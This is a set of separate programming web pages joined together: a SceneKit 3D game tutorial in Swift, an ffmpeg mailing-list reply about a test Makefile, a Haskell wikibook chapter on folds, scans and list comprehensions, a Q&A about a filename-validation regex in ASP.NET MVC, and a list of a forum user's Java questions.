- For the type of light, we assign SCNLightTypeAmbient to get an ambient light source. Since we don't want the light source to be very strong, as it is reflected light, we assign darkGrayColor to the color.
- Finally, we add the light source to the scene. Strictly, there is no need to add the ambient light source, but it will give the scene softer shadows. You can remove the ambient light source to see the difference.

Call the addLightSourceNode function in the init function. Now, build and run the scene to see an actual sphere with proper lighting, as shown in the following screenshot:

You can place a finger on the screen and move it to rotate the camera, as we have enabled camera control. You can use two fingers to pan the camera, and you can double-tap to reset the camera to its original position and direction.

Adding a camera to the scene

Next, let us add a camera to the scene, as the default camera is very close. Create a new function called addCameraNode in the class and add the following code in it:

func addCameraNode() {
    let cameraNode = SCNNode()
    cameraNode.camera = SCNCamera()
    cameraNode.position = SCNVector3(x: 0, y: 0, z: 15)
    scene.rootNode.addChildNode(cameraNode)
}

Here, again, we create an empty node called cameraNode. We assign SCNCamera to the camera property of cameraNode. Next we position the camera such that we keep the x and y values at zero and move the camera back in the z direction by 15 units. Then we add the camera to the rootNode of the scene, and call addCameraNode at the bottom of the init function. In this scene, the origin is at the center of the scene, unlike SpriteKit, where the origin of a scene is always at the bottom left. Here, positive x and y are to the right of and up from the center, and the positive z direction is toward you. Note that we didn't move the sphere back or reduce its size; the sphere appears smaller purely because we moved the camera backward in the scene. Let us next create a floor so that we can get a better sense of depth in the scene. Also, this way, we will learn how to create floors.
Adding a floor

In the class, add a new function called addFloorNode and add the following code:

func addFloorNode() {
    var floorNode = SCNNode()
    floorNode.geometry = SCNFloor()
    floorNode.position.y = -1.0
    scene.rootNode.addChildNode(floorNode)
}

For creating a floor, we create a variable called floorNode of type SCNNode. We then assign SCNFloor to the geometry property of floorNode. For the position, we assign the y value to -1, as we want the sphere to appear above the floor. At the end, as usual, we add floorNode to the root node of the scene. In the following screenshot, I have rotated the camera to show the scene in full action. Here we can see that the floor is gray in color, the sphere is casting its reflection on the floor, and the bright omni light is visible at the top left of the sphere.

Importing scenes from external 3D applications

Although we can add objects, cameras, and lights through code, this would become very tedious and confusing once we had a lot of objects in the scene. In SceneKit, this problem can easily be overcome by importing scenes prebuilt in other 3D applications. All major 3D applications, such as 3D Studio Max, Maya, Cheetah 3D, and Blender, can export scenes in Collada (.dae) and Alembic (.abc) formats. We can import these scenes, with lighting, camera, and textured objects, directly into SceneKit, without needing to set up the scene. In this section, we will import a Collada file into the scene. Drag this file into the current project. Along with the DAE file, also add the monster.png file to the project, otherwise you will see only the untextured monster mesh in the scene. Click on the monsterScene.DAE file. If the textured monster is not automatically loaded, drag the monster.png file from the project onto the monster mesh in the preview window, and release the mouse button once you see a (+) sign while over the monster mesh. Now you will be able to see the monster properly textured.
The panel on the left shows the entities in the scene. Below the entities, the scene graph is shown and the view on the right is the preview pane. Entities show all the objects in the scene and the scene graph shows the relation between these entities. If you have certain objects that are children to other objects, the scene graph will show them as a tree. For example, if you open the triangle next to CATRigHub001, you will see all the child objects under it. You can use the scene graph to move and rotate objects in the scene to fine-tune your scene. You can also add nodes, which can be accessed by code. You can see that we already have a camera and a spotlight in the scene. You can select each object and move it around using the arrow at the pivot point of the object. You can also rotate the scene to get a better view by clicking and dragging the left mouse button on the preview scene. For zooming, scroll your mouse wheel up and down. To pan, hold the Alt button on the keyboard and left-click and drag on the preview pane. One thing to note is that rotating, zooming, and panning in the preview pane won't actually move your camera. The camera is still at the same position and angle. To view from the camera, again select the Camera001 option from the drop-down list in the preview pane and the view will reset to the camera view. At the bottom of the preview window, we can either choose to see the view through the camera or spotlight, or click-and-drag to rotate the free camera. If you have more than one camera in your scene, then you will have Camera002, Camera003, and so on in the drop-down list. Below the view selection dropdown in the preview panel you also have a play button. If you click on the play button, you can look at the default animation of the monster getting played in the preview window. The preview panel is just that; it is just to aid you in having a better understanding of the objects in the scene. 
In no way is it a replacement for a regular 3D package such as 3DS Max, Maya, or Blender. You can create cameras, lights, and empty nodes in the scene graph, but you can't add geometry such as boxes and spheres. You can, however, add an empty node and position it in the scene graph, and then create geometry in code and attach it to that node. Now that we have an understanding of the scene graph, let us see how we can run this scene in SceneKit. In the init function, delete the line where we initialized the scene and add the following line instead. Also delete the calls that added our earlier objects, light, and camera:

init(currentview view: SCNView) {
    super.init()
    scnView = view
    _size = scnView.bounds.size

    // retrieve the SCNView
    // scene = SCNScene()
    scene = SCNScene(named: "monsterScene.DAE")
    scnView.scene = scene
    scnView.allowsCameraControl = true
    scnView.showsStatistics = true
    scnView.backgroundColor = UIColor.yellowColor()

    // self.addGeometryNode()
    // self.addLightSourceNode()
    // self.addCameraNode()
    // self.addFloorNode()
}

Build and run the game to see the following screenshot: you will see the monster running against the yellow background that we initially assigned to the scene. If you export the animations along with the scene, the animation starts playing automatically once the scene loads in SceneKit. Also, you will notice that we have deleted the camera and light we created earlier in code. So, how come a default camera and light aren't loaded into the scene? What is happening here is that, when I exported the file, I inserted a camera and a spotlight into the scene. When we imported the file, SceneKit automatically recognized that there is a camera already present and used it as the default camera. Similarly, the spotlight already in the scene is taken as the default light source, and lighting is calculated accordingly.
Adding objects and physics to the scene

Let us now see how we can access each of the objects in the scene graph and add gravity to the monster.

Accessing the hero object and adding a physics body

Create a new function called addColladaObjects and call an addHero function in it. Create a global variable called heroNode of type SCNNode; we will use this node to access the hero object in the scene. Update the init function as highlighted, and add the addHero function:

init(currentview view: SCNView) {
    super.init()
    scnView = view
    _size = scnView.bounds.size

    // retrieve the SCNView
    // scene = SCNScene()
    scene = SCNScene(named: "monster.scnassets/monsterScene.DAE")
    scnView.scene = scene
    scnView.allowsCameraControl = true
    scnView.showsStatistics = true
    scnView.backgroundColor = UIColor.yellowColor()

    self.addColladaObjects()
    // self.addGeometryNode()
    // self.addLightSourceNode()
    // self.addCameraNode()
    // self.addFloorNode()
}

func addHero() {
    heroNode = SCNNode()
    var monsterNode = scene.rootNode.childNodeWithName("CATRigHub001", recursively: false)
    heroNode.addChildNode(monsterNode!)
    heroNode.position = SCNVector3Make(0, 0, 0)

    let collisionBox = SCNBox(width: 10.0, height: 10.0, length: 10.0, chamferRadius: 0)
    heroNode.physicsBody = SCNPhysicsBody.dynamicBody()
    heroNode.physicsBody?.physicsShape = SCNPhysicsShape(geometry: collisionBox, options: nil)
    heroNode.physicsBody?.mass = 20
    heroNode.physicsBody?.angularVelocityFactor = SCNVector3Zero

    heroNode.name = "hero"
    scene.rootNode.addChildNode(heroNode)
}

First, we call the addColladaObjects function in the init function, as highlighted. Then we create the addHero function, in which we initialize heroNode. To actually move the monster, we need access to the CATRigHub001 node, which we get through the childNodeWithName method of scene.rootNode. For each object that we wish to access through code, we call childNodeWithName on the rootNode of the scene and pass in the name of the object.
If recursively is set to true, SceneKit will search through all descendant nodes to find the named node. Since the node we are looking for is right at the top, we pass false to save processing time. We store the result in a temporary variable called monsterNode and, in the next step, add the monsterNode variable to heroNode. We then set the position of the hero node to the origin. For heroNode to interact with other physics bodies in the scene, we have to assign a shape to its physics body. We could use the mesh of the monster, but the shape might not be calculated properly, and a box is a much simpler shape than the monster's mesh. For creating a box collider, we create a new box geometry roughly the width, height, and depth of the monster. Then, using the physicsBody?.physicsShape property of heroNode, we assign it the shape of the collisionBox we created. Since we want the body to be affected by gravity, we assign the dynamic physics body type (we will see other body types later). Since we want the body to be highly responsive to gravity, we assign a value of 20 to the mass of the body. In the next step, we set the angularVelocityFactor to 0 in all three directions, as we want the body to move straight up and down when a vertical force is applied; if we don't do this, the body will flip-flop around. We also assign the name hero to the monster so that we can check whether a collided object is the hero or not; this will come in handy when we check for collisions with other objects. Finally, we add heroNode to the scene. Add addColladaObjects to the init function, and comment out or delete the self.addGeometryNode, self.addLightSourceNode, self.addCameraNode, and self.addFloorNode calls if you haven't already. Then, run the game to see the monster slowly falling through the floor. We will create a small patch of ground right underneath the monster so that it doesn't fall down.
Adding ground

Create a new function called addGround and add the following:

func addGround() {
    let groundBox = SCNBox(width: 10, height: 2, length: 10, chamferRadius: 0)
    let groundNode = SCNNode(geometry: groundBox)
    groundNode.position = SCNVector3Make(0, -1.01, 0)
    groundNode.physicsBody = SCNPhysicsBody.staticBody()
    groundNode.physicsBody?.restitution = 0.0
    scene.rootNode.addChildNode(groundNode)
}

We create a new constant called groundBox of type SCNBox, with a width and length of 10 and a height of 2. Chamfer is the rounding of the edges of the box; since we don't want any rounding of the corners, it is set to 0. Next we create an SCNNode called groundNode and assign groundBox to it. We place it slightly below the origin: since the height of the box is 2, we place it at -1.01 so that heroNode will rest at (0, 0, 0) when the monster stands on the ground. Next we assign a physics body of type static. Also, since we don't want the hero to bounce off the ground when he falls on it, we set the restitution to 0. Finally, we add the ground to the scene's rootNode. The reason we made this body static instead of dynamic is that a dynamic body is affected by gravity and other forces, but a static one isn't. So, in this scene, even though gravity is acting downward, the hero will fall, but groundBox won't, as it is a static body. You will see that the physics syntax is very similar to SpriteKit, with static bodies and dynamic bodies, gravity, and so on. And, once again as in SpriteKit, the physics simulation is automatically turned on when we run the scene. Add the addGround function to the addColladaObjects function and run the game to see the monster affected by gravity and stopping when it comes into contact with the ground.

Adding an enemy node

To check collision in SceneKit, we could simply check for collision between the hero and the ground. But let us make it a little more interesting and also learn a new kind of body type: the kinematic body.
For this, we will create a new box called enemy and make it move and collide with the hero. Create a new global SCNNode called enemyNode as follows:

let scnView: SCNView!
let _size: CGSize!
var scene: SCNScene!
var heroNode: SCNNode!
var enemyNode: SCNNode!

Also, create a new function called addEnemy in the class and add the following in it:

func addEnemy() {
    let geo = SCNBox(width: 4.0, height: 4.0, length: 4.0, chamferRadius: 0.0)
    geo.firstMaterial?.diffuse.contents = UIColor.yellowColor()

    enemyNode = SCNNode(geometry: geo)
    enemyNode.position = SCNVector3Make(0, 20.0, 60.0)
    enemyNode.physicsBody = SCNPhysicsBody.kinematicBody()
    scene.rootNode.addChildNode(enemyNode)
    enemyNode.name = "enemy"
}

Nothing too fancy here! Just as when adding the groundNode, we create a cube with all its sides four units long and give it a yellow material. We then initialize enemyNode, position it along the x, y, and z axes, and assign the kinematic body type instead of static or dynamic. Then we add the body to the scene and, finally, name the enemyNode "enemy", which we will need when checking for collisions. Before we forget, call the addEnemy function in the addColladaObjects function, after the addHero call. The difference with the kinematic body type is that, like a static body, it is not affected by external forces such as gravity, but unlike a static body, we can still move it ourselves. Here we won't be applying any force to move the enemy block; we will simply move the object, just like we moved the enemy in the SpriteKit game. It is like making the same game in 3D instead of 2D, showing that although we have a third dimension, the same principles of game development apply to both. For moving the enemy, we need an update function for the enemy.
So, let us add it by creating an updateEnemy function with the following content:

func updateEnemy() {
    enemyNode.position.z += -0.9
    if (enemyNode.position.z - 5.0) < -40 {
        var factor = arc4random_uniform(2) + 1
        if factor == 1 {
            enemyNode.position = SCNVector3Make(0, 2.0, 60.0)
        } else {
            enemyNode.position = SCNVector3Make(0, 15.0, 60.0)
        }
    }
}

In this function, similar to how we moved the enemy in the SpriteKit game, we move the enemy by 0.9 units per frame, the difference being that here we move along the negative z direction. Once the enemy has gone past roughly -35 in the z direction (the check subtracts a 5-unit margin before comparing against -40), we reset its position. To create an additional challenge for the player, when the enemy resets, a random number is chosen between 1 and 2. If it is 1, the enemy is placed close to the ground; otherwise it is placed 15 units above the ground. Later, we will add a jump mechanic to the hero. When the enemy is close to the ground, the hero has to jump over the enemy box, but when the enemy spawns at a height, the hero shouldn't jump; if he jumps and hits the enemy box, it is game over. Later we will also add a scoring mechanism to keep score. For the enemy to actually move and have its position reset, we need an update function to call updateEnemy from. So, create a function called update in the class and call the updateEnemy function in it as follows:

func update() {
    updateEnemy()
}

Summary

This article has given insight into how to create a scene with SCNScene, add objects to a scene, import scenes from external 3D applications, add physics to the scene, and add an enemy.
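As a closing aside, the enemy movement-and-respawn rule described above is independent of SceneKit. Here is the same logic as a small language-agnostic sketch in Python (the function name and the tuple representation are inventions for illustration; the constants mirror the Swift code):

```python
import random

def update_enemy(pos):
    """pos is an (x, y, z) tuple; returns the position after one frame."""
    x, y, z = pos
    z += -0.9                       # move along negative z each frame
    if z - 5.0 < -40:               # past the player (5-unit margin): respawn
        # 50/50 chance of a low spawn (jump over it) or a high spawn (don't jump)
        y = 2.0 if random.randint(1, 2) == 1 else 15.0
        return (0.0, y, 60.0)
    return (x, y, z)
```

Running the rule repeatedly from z = 60 shows the enemy marching toward the player and then snapping back to z = 60 at a randomly chosen height.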
https://www.packtpub.com/books/content/scenekit
Hi Diego, On Sat, 2007-01-06 at 16:01 +0100, Diego Biurrun wrote: [...] > > --- tests/Makefile (revision 7406) > > +++ tests/Makefile (working copy) > > @@ -16,7 +16,14 @@ > > > > +ifeq ($(CONFIG_SWSCALER),yes) > > +all fulltest test: > > + @echo > > + @echo "Cannot perform tests if libswscaler is enabled" > > Nit: Missing period at the end. > > Also, there is no such thing as libswscaleR. The directory is called > libswscale, the program software scaler, the configure option swscaler. > We should settle on a name someday. Ok; maybe the right thing to write here should be "... if the software scaler is enabled", since "libswscale is enabled" does not make too much sense :). > > + @echo > > +else > > all fulltest test: codectest libavtest test-server > > +endif > > Do both codectest and libavtest fail? Yes, they both fail. > What if I call codectest or libavtest directly? > I think your patch will not help then... You are right; I tried to make the patch as simple as possible by only considering the most common case (make test). I'll rewrite the patch protecting all the "codectest", "libavtest", and "test-server" targets with "ifeq ($(CONFIG_SWSCALER),yes)". Thanks, Luca
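Applying that suggestion, the fully guarded tests/Makefile could look roughly like this (a sketch only; the CONFIG_SWSCALER variable and the target names come from the patch discussion, while the recipe bodies are placeholders):

```make
ifeq ($(CONFIG_SWSCALER),yes)
all fulltest test codectest libavtest test-server:
	@echo
	@echo "Cannot perform tests if the software scaler is enabled."
	@echo
else
all fulltest test: codectest libavtest test-server

codectest libavtest test-server:
	@echo "original recipes for each target go here"
endif
```

This way, invoking codectest or libavtest directly prints the same message instead of failing.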
http://ffmpeg.org/pipermail/ffmpeg-devel/2007-January/027122.html
Haskell/Lists III

Folds

Like map, a fold is a higher order function that takes a function and a list. However, instead of applying the function element by element, the fold uses it to combine the list elements into a result value. Let's look at a few concrete examples. sum could be implemented as:

Example: sum

sum :: [Integer] -> Integer
sum [] = 0
sum (x:xs) = x + sum xs

and product as:

Example: product

product :: [Integer] -> Integer
product [] = 1
product (x:xs) = x * product xs

concat, which takes a list of lists and joins (concatenates) them into one:

Example: concat

concat :: [[a]] -> [a]
concat [] = []
concat (x:xs) = x ++ concat xs

All these examples show a pattern of recursion known as a fold. Think of the name referring to a list getting "folded up" into a single value or to a function being "folded between" the elements of the list. Prelude defines four fold functions: foldr, foldl, foldr1 and foldl1.

foldr

The right-associative foldr folds up a list from the right to left. As it proceeds, foldr uses the given function to combine each of the elements with the running value called the accumulator. When calling foldr, the initial value of the accumulator is set as an argument.

foldr :: (a -> b -> b) -> b -> [a] -> b
foldr f acc [] = acc
foldr f acc (x:xs) = f x (foldr f acc xs)

The first argument to foldr is a function with two arguments. The second argument is the value for the accumulator (which often starts at a neutral "zero" value). The third argument is the list to be folded. In sum, f is (+), and acc is 0. In concat, f is (++) and acc is []. In many cases (like all of our examples so far), the function passed to a fold will be one that takes two arguments of the same type, but this is not necessarily the case (as we can see from the (a -> b -> b) part of the type signature — if the types had to be the same, the first two letters in the type signature would have matched).
Remember, a list in Haskell written as [a, b, c] is an alternative (syntactic sugar) style for a : b : c : []. Now, foldr f acc xs in the foldr definition simply replaces each cons (:) in the xs list with the function f while replacing the empty list at the end with acc:

foldr f acc (a:b:c:[]) = f a (f b (f c acc))

Note how the parentheses nest around the right end of the list. An elegant visualisation is given by picturing the list data structure as a tree:

  :                        f
 / \                      / \
a   :    foldr f acc     a   f
   / \   ---------->        / \
  b   :                    b   f
     / \                      / \
    c   []                   c   acc

We can see here that foldr (:) [] will return the list completely unchanged. That sort of function that has no effect is called an identity function. You should start building a habit of looking for identity functions in different cases, and we'll discuss them more later when we learn about monoids.

foldl

The left-associative foldl processes the list in the opposite direction, starting at the left side with the first element.

foldl :: (a -> b -> a) -> a -> [b] -> a
foldl f acc [] = acc
foldl f acc (x:xs) = foldl f (f acc x) xs

So, brackets in the resulting expression accumulate around the left end of the list:

foldl f acc (a:b:c:[]) = f (f (f acc a) b) c

The corresponding trees look like:

  :                         f
 / \                       / \
a   :    foldl f acc      f   c
   / \   ---------->     / \
  b   :                 f   b
     / \               / \
    c   []           acc  a

Because all folds include both left and right elements, beginners can get confused by the names. You could think of foldr as short for fold-right-to-left and foldl as fold-left-to-right. The names refer to where the fold starts.

Note

Technical Note: foldl is tail-recursive, that is, it recurses immediately, calling itself. For this reason the compiler will optimise it to a simple loop for efficiency. However, Haskell is a lazy language, so the calls to f will be left unevaluated by default, thus building up an unevaluated expression in memory that includes the entire length of the list.
To avoid running out of memory, we have a version of foldl called foldl' that is strict — it forces the evaluation of f immediately at each step. An apostrophe at the end of a function name is pronounced "tick" as in "fold-L-tick". A tick is a valid character in Haskell identifiers. foldl' can be found in the Data.List library module (imported by adding import Data.List to the beginning of a source file). As a rule of thumb, you should use foldr on lists that might be infinite or where the fold is building up a data structure and use foldl' if the list is known to be finite and comes down to a single value. There is almost never a good reason to use foldl (without the tick), though it might just work if the lists fed to it are not too long.

Are foldl and foldr opposites?

As previously noted, the type declaration for foldr makes it quite possible for the list elements and result to be of different types. For example, "read" is a function that takes a string and converts it into some type (the type system is smart enough to figure out which one). In this case we convert it into a float.

Example: The list elements and results can have different types

addStr :: String -> Float -> Float
addStr str x = read str + x

sumStr :: [String] -> Float
sumStr = foldr addStr 0.0

There is also a variant called foldr1 ("fold - R - one") which dispenses with an explicit "zero" for an accumulator by taking the last element of the list instead:

foldr1 :: (a -> a -> a) -> [a] -> a
foldr1 f [x] = x
foldr1 f (x:xs) = f x (foldr1 f xs)
foldr1 _ [] = error "Prelude.foldr1: empty list"

And foldl1 as well:

foldl1 :: (a -> a -> a) -> [a] -> a
foldl1 f (x:xs) = foldl f x xs
foldl1 _ [] = error "Prelude.foldl1: empty list"

Note: Just like for foldl, the Data.List library includes foldl1' as a strict version of foldl1.

With foldl1 and foldr1, all the types have to be the same, and an empty list is an error.
These variants are useful when there is no obvious candidate for the initial accumulator value and we are sure that the list is not going to be empty. When in doubt, stick with foldr or foldl'.

folds and laziness

One reason that right-associative folds are more natural in Haskell than left-associative ones is that right folds can operate on infinite lists. A fold that returns an infinite list is perfectly usable in a larger context that doesn't need to access the entire infinite result. In that case, foldr can move along as much as needed and the compiler will know when to stop. However, a left fold necessarily calls itself recursively until it reaches the end of the input list (because the recursive call is not made in an argument to f). Needless to say, no end will be reached if an input list to foldl is infinite. As a toy example, consider a function echoes that takes a list of integers and produces a list such that wherever the number n occurs in the input list, it is replicated n times in the output list. To create our echoes function, we will use the prelude function replicate, in which replicate n x is a list of length n with x the value of every element. We can write echoes as a foldr quite handily:

echoes = foldr (\ x xs -> (replicate x x) ++ xs) []

take 10 (echoes [1..]) -- [1,2,2,3,3,3,4,4,4,4]

(Note: This definition is compact thanks to the \ x xs -> syntax. The \, meant to look like a lambda (λ), works as an unnamed function for cases where we won't use the function again anywhere else. Thus, we provide the definition of our one-time function in situ. In this case, x and xs are the arguments, and the right-hand side of the definition is what comes after the ->.)

We could have instead used a foldl:

echoes = foldl (\ xs x -> xs ++ (replicate x x)) []

take 10 (echoes [1..]) -- not terminating

but only the foldr version works on infinite lists. What would happen if you just evaluate echoes [1..]? Try it!
(If you try this in GHCi or a terminal, remember you can stop an evaluation with Ctrl-C, but you have to be quick and keep an eye on the system monitor, or your memory will be consumed in no time and your system will hang.)

As a final example, map itself can be implemented as a fold:

map f = foldr (\ x xs -> f x : xs) []

Folding takes some time to get used to, but it is a fundamental pattern in functional programming and eventually becomes very natural. Any time you want to traverse a list and build up a result from its members, you likely want a fold.

Scans

A "scan" is like a cross between a map and a fold. Folding a list accumulates a single return value, whereas mapping puts each item through a function, returning a separate result for each item. A scan does both: it accumulates a value like a fold, but instead of returning only a final value it returns a list of all the intermediate values.

The Prelude contains four scan functions:

scanl :: (a -> b -> a) -> a -> [b] -> [a]

scanl accumulates the list from the left, and the second argument becomes the first item in the resulting list. So, scanl (+) 0 [1,2,3] = [0,1,3,6].

scanl1 :: (a -> a -> a) -> [a] -> [a]

scanl1 uses the first item of the list as a zero parameter. It is what you would typically use if the input and output items are the same type. Notice the difference in the type signatures between scanl and scanl1. scanl1 (+) [1,2,3] = [1,3,6].

scanr :: (a -> b -> b) -> b -> [a] -> [b]

scanr (+) 0 [1,2,3] = [6,5,3,0]

scanr1 :: (a -> a -> a) -> [a] -> [a]

scanr1 (+) [1,2,3] = [6,5,3]

These two functions are the counterparts of scanl and scanl1 that accumulate the totals from the right.

filter

A common operation performed on lists is filtering — generating a new list composed only of elements of the first list that meet a certain condition. A simple example: making a list of only even numbers from a list of integers.
retainEven :: [Int] -> [Int]
retainEven [] = []
retainEven (n:ns) =
  -- mod n 2 computes the remainder for the integer division of n by 2.
  if (mod n 2) == 0
    then n : (retainEven ns)
    else retainEven ns

This definition is somewhat verbose and specific. The Prelude provides a concise and general filter function with this type signature:

filter :: (a -> Bool) -> [a] -> [a]

So, an (a -> Bool) function tests an element for some condition, we then feed in a list to be filtered, and we get back the filtered list. To write retainEven using filter, we need to state the condition as an auxiliary (a -> Bool) function, like this one:

isEven :: Int -> Bool
isEven n = (mod n 2) == 0

And then retainEven becomes simply:

retainEven ns = filter isEven ns

We used ns instead of xs to indicate that we know these are numbers and not just anything, but we can ignore that and use a more terse point-free definition:

retainEven = filter isEven

This is like what we demonstrated before for map and the folds. Like filter, those take another function as an argument; and using them point-free emphasizes this "functions-of-functions" aspect.

List comprehensions

List comprehensions are syntactic sugar for some common list operations, such as filtering. For instance, instead of using the Prelude filter, we could write retainEven like this:

retainEven es = [n | n <- es, isEven n]

This compact syntax may look intimidating, but it is simple to break down. One interpretation is:

- (Starting from the middle) Take the list es and draw (the "<-") each of its elements as a value n.
- (After the comma) For each drawn n, test the boolean condition isEven n.
- (Before the vertical bar) If (and only if) the boolean condition is satisfied, append n to the new list being created (note the square brackets around the whole expression).

Thus, if es is [1,2,3,4], then we would get back the list [2,4]. 1 and 3 were not included because (isEven n) == False.

The power of list comprehensions comes from being easily extensible.
Firstly, we can use as many tests as we wish (even zero!). Multiple conditions are written as a comma-separated list of expressions (which should evaluate to a Boolean, of course). For a simple example, suppose we want to modify retainEven so that only numbers larger than 100 are retained:

retainLargeEvens :: [Int] -> [Int]
retainLargeEvens es = [n | n <- es, isEven n, n > 100]

Furthermore, we are not limited to using n as the element to be appended when generating a new list. Instead, we could place any expression before the vertical bar (if it is compatible with the type of the list, of course). For instance, if we wanted to subtract one from every even number, all it would take is:

evensMinusOne es = [n - 1 | n <- es, isEven n]

In effect, that means the list comprehension syntax incorporates the functionalities of map and filter.

To further sweeten things, the left arrow notation in list comprehensions can be combined with pattern matching. For example, suppose we had a list of (Int, Int) tuples, and we would like to construct a list with the first element of every tuple whose second element is even. Using list comprehensions, we might write it as follows:

firstForEvenSeconds :: [(Int, Int)] -> [Int]
firstForEvenSeconds ps = [fst p | p <- ps, isEven (snd p)] -- here, p is for pairs

Patterns can make it much more readable:

firstForEvenSeconds ps = [x | (x, y) <- ps, isEven y]

As in other cases, arbitrary expressions may be used before the |. If we wanted a list with the double of those first elements:

doubleOfFirstForEvenSeconds :: [(Int, Int)] -> [Int]
doubleOfFirstForEvenSeconds ps = [2 * x | (x, y) <- ps, isEven y]

Not counting spaces, that function code is shorter than its descriptive name!

There are even more possible tricks:

allPairs :: [(Int, Int)]
allPairs = [(x, y) | x <- [1..4], y <- [5..8]]

This comprehension draws from two lists, and generates all possible (x, y) pairs with the first element drawn from [1..4] and the second from [5..8].
In the final list of pairs, the first elements will be those generated with the first element of the first list (here, 1), then those with the second element of the first list, and so on. In this example, the full list is (line breaks added for clarity):

Prelude> [(x, y) | x <- [1..4], y <- [5..8]]
[(1,5),(1,6),(1,7),(1,8),
 (2,5),(2,6),(2,7),(2,8),
 (3,5),(3,6),(3,7),(3,8),
 (4,5),(4,6),(4,7),(4,8)]

We could easily add a condition to restrict the combinations that go into the final list:

somePairs = [(x, y) | x <- [1..4], y <- [5..8], x + y > 8]

This list only has the pairs with the sum of elements larger than 8, starting with (1,8), then (2,7), and so forth.
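List comprehensions in languages such as Python were directly inspired by this notation, so the fold, scan, filter, and comprehension patterns above translate almost mechanically. As a cross-language sketch (Python here is purely illustrative — the chapter itself is about Haskell), functools.reduce plays the role of a strict left fold and itertools.accumulate the role of a scan (the `initial` parameter of accumulate needs Python 3.8+):

```python
from functools import reduce
from itertools import accumulate

# foldl'-analogue: reduce is a strict left fold (compare sumStr above)
sum_str = reduce(lambda acc, s: acc + float(s), ["1.5", "2.5"], 0.0)
print(sum_str)  # 4.0

# reduce without an initial value behaves like foldl1: empty input is an error
# reduce(lambda a, b: a + b, [])  -> raises TypeError

# scanl / scanl1 analogues: accumulate keeps every intermediate total
print(list(accumulate([1, 2, 3], initial=0)))  # [0, 1, 3, 6]  ~ scanl (+) 0
print(list(accumulate([1, 2, 3])))             # [1, 3, 6]     ~ scanl1 (+)

# filter, as in retainEven
print([n for n in [1, 2, 3, 4] if n % 2 == 0])  # [2, 4]

# drawing from two lists with a condition, as in somePairs
print([(x, y) for x in range(1, 5) for y in range(5, 9) if x + y > 8])
# [(1, 8), (2, 7), (2, 8), (3, 6), (3, 7), (3, 8), (4, 5), (4, 6), (4, 7), (4, 8)]
```

Note that Python's reduce is eager, so it corresponds to foldl' rather than to the lazy foldr; there is no built-in right fold that works on infinite input.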
https://en.wikibooks.org/wiki/Haskell/Lists_III
ASP.NET MVC regular expression in view model for filename validation

I've read a few questions that answer this, and I understand the regular expression I'm required to use; however, actually applying it in MVC is where I stumble. I will also preface by saying I am terrible at regular expressions so far. I'm writing a file upload application in MVC and I want to apply standard Windows filename validation: \ / : * ? " < > | are invalid characters anywhere in the name. My view model for this is set up like so, using a different regex I found:

public class FileRenameModel
{
    [RegularExpression(@"^[\w\-. ]+$", ErrorMessage="A filename cannot contain \\ / : * ? \" < > |")]
    [Required]
    public string Filename { get; set; }

    [Required]
    public int FileID { get; set; }
}

Whenever I try to change the regex to @"^[\\/:?"<>|]+$ the " in the middle kills it and throws an error. I haven't figured out how to properly escape it so that I can include it in the string. When I use the regex without the " it tells me any string I put into the textbox fails. Am I using the ^ incorrectly?

Answers

Use a doubled quote ("") to escape quotes after starting a string with @. To match anything except the listed characters, insert an additional ^ inside the brackets, which turns the character class into a negated ("anything but") class. Including the * from your list of invalid characters, that gives:

@"^[^\\/:*?""<>|]+$"

Keep the ^ at the beginning as well to match the start of the line. Having said that, keep in mind for validation that browsers handle file names differently. Some older browsers sent a path along with the filename; that might break your validation for a legitimate file.
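The negated character class can be sanity-checked outside of ASP.NET before wiring it into the view model. A quick sketch using Python's re module (chosen only for illustration — the class syntax is the same in the .NET regex engine, minus the C# string-escaping concerns):

```python
import re

# One or more characters, none of which is \ / : * ? " < > |
FILENAME_RE = re.compile(r'^[^\\/:*?"<>|]+$')

assert FILENAME_RE.match("report 2014.txt")        # plain name is fine
assert not FILENAME_RE.match("bad:name.txt")       # ':' is rejected
assert not FILENAME_RE.match('say "hi".txt')       # '"' is rejected
assert not FILENAME_RE.match("")                   # empty fails the +
print("all filename checks passed")
```

The `\\` inside the raw string is a regex-level escape for a literal backslash; it is unrelated to the C#-level `""` escaping discussed in the answer.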
http://unixresources.net/faq/16344492.shtml
Type: Posts; User: flex567

Solved that problem with '\\' (a lone backslash is an unterminated character literal, so it must be written as the escaped literal '\\'):

for (int i = 0; i <= c_path_name.length - 1; i++) {
    if (c_path_name[i] == '\\') {
        c_path_name[i] = '/';
    }
}

Can someone explain to me why this won't compile?...

I get these 2 warnings when I run Eclipse. Why are they popping up and what can I do to fix them?

aha, now it works. Thanx.

Hi, can anyone explain why this error occurs?

hm, I guess it is better that I remove double quotes in the MySQL database.

hi, I created a function that returns an id field and a proverb field in MySQL. Right now my function returns this row: 1"The die is cast". In XML format this would probably look like this ...

Hi, anybody knows what is the problem here?

Actually now it works. I don't really know why there is a setSSLOnConnect function instead of the setSSL function on their webpage.

I added the classes that were needed but it still won't work. The problem is that the function setSSLOnConnect is undefined. The proposed solution is to add a cast to Email, but even after casting it won't work. ...

after some tweaking i fixed some errors

hi, Can somebody explain to me why this code won't compile? I would like to send an email with this program. I got the program from here: ...

i just found an error

Where should i put it? here are some options

Anybody knows why this code won't compile?

package com.leebrainlow.tween;

import android.app.Activity;
import android.os.Bundle;
import android.view.View;
import...

yesterday it wouldn't compile, but today i compiled it and ran it with no problem (and i didn't change anything)?

Hi, Can you tell me why this program won't compile? The problem is "id" (red underline). I can provide some additional...

so actually the JVM calls these functions? How is it possible that we never call the actionPerformed and run functions? We just declare them.

oh, i understand. I created 2 variables with the same name (JButton gmPlus) - inside the function and ...

Can you explain this a little bit more.
What should I fix in this code in order for this program to work? I don't know why all the conditions in all the if statements are always negative (false). This is a calculator; I didn't make any notes because I thought it was an easy program.

import javax.swing.*;
import java.awt.*;
import java.awt.Event.*;
import java.awt.event.ActionEvent;...
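The fix in the first snippet of this thread comes down to character-literal escaping: in Java (and most C-family languages) '\' is an unterminated literal, so the backslash itself must be written '\\'. The same rule applies in Python string literals; a tiny sketch of the path-separator swap the poster was attempting (illustrative only — the original code is Java):

```python
# A single backslash must be escaped in source code: "\\" is ONE character
assert len("\\") == 1

path = "C:\\temp\\file.txt"          # the path C:\temp\file.txt
print(path.replace("\\", "/"))       # C:/temp/file.txt
```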
http://forums.codeguru.com/search.php?s=54f8cf62a47e60d50e32afdcb5cb03b1&searchid=5096403
Adding Qt forms to an existing project

